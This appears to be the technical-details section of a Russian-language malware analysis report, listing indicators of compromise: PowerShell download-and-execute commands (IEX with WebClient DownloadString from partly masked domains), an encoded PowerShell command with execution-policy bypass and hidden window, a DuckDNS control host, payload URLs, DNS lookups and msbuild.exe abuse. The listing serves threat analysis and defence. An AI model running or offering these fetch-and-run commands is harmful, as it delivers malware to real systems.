Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://ah##ric.si/Code.txt')
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- 'cr######remlin.duckdns.org':3396
- http://ah##ric.si/Code.txt
- http://of######ervice-tech.info/rnp.txt
- http://of######ervice-tech.info/pld.txt
- DNS ASK ah##ric.si
- DNS ASK of######ervice-tech.info
- DNS ASK cr######remlin.duckdns.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://ah##ric.si/Code.txt')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -w 1 /e JABiAGgAZwBmAGQAcwBkAGYAZwBoAGYANgA1AGgAZgBnAGQAIAA9ACAAKAAnAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACcALQBmACcAZABTAHQAJwAsACcAcgBpAG4AJwAsABwgYABEAGAAbwBgAHcAbgBgAGwAY...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'